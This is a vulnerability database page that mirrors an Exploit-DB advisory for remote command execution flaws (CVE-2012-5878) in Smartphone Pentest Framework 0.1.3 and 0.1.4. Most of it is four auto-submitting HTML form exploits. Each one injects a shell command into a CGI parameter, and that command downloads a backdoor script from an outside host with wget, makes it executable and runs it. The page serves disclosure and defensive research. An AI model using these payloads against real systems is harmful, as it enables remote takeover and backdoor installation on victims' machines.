Lucene search
+L

Smartphone Pentest Framework - Multiple Remote Command Execution Vulnerabilities

🗓️ 10 Dec 2012 00:00:00Reported by High-Tech BridgeType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

Smartphone Pentest Framework Remote Command Execution Vulnerabilitie

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
Smartphone Pentest Framework 0.1.3 / 0.1.4 Command Injection
12 Dec 201200:00
zdt
circl
Circl
CVE-2012-5878
10 Dec 201200:00
circl
cve
CVE
CVE-2012-5878
3 Jan 202019:30
cve
cvelist
Cvelist
CVE-2012-5878
3 Jan 202019:30
cvelist
htbridge
htbridge
Multiple Command Execution Vulnerabilities in Smartphone Pentest Framework (SPF)
19 Nov 201200:00
htbridge
nvd
NVD
CVE-2012-5878
3 Jan 202020:15
nvd
packetstorm
Packet Storm
Smartphone Pentest Framework 0.1.3 / 0.1.4 Command Injection
11 Dec 201200:00
packetstorm
prion
Prion
Code injection
3 Jan 202020:15
prion
prion
Prion
Code injection
3 Jan 202020:15
prion
securityvulns
securityvulns
Multiple Command Execution Vulnerabilities in Smartphone Pentest Framework
11 Dec 201200:00
securityvulns
Rows per page
source: https://www.securityfocus.com/bid/56881/info

Smartphone Pentest Framework is prone to multiple remote command-execution vulnerabilities.

Remote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer.

Smartphone Pentest Framework 0.1.3 and 0.1.4 are vulnerable; other versions may also be affected.

1.

<form action="http://www.example.com/cgi-bin/frameworkgui/SEAttack.pl"
method="post" name=f1>
<input type="hidden" name="platformDD2" value='android' />
<input type="hidden" name="hostingPath" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.ch &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>

2.

<form action="http://www.example.com/cgi-bin/frameworkgui/CSAttack.pl"
method="post" name=f1>
<input type="hidden" name="hostingPath" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>

3.

<form
action="http://www.example.com/cgi-bin/frameworkgui/attachMobileModem.pl"
method="post" name=f1>
<input type="hidden" name="appURLPath" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>

4.

<form
action="http://www.example.com/cgi-bin/frameworkgui/guessPassword.pl"
method="post" name=f1>
<input type="hidden" name="ipAddressTB" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation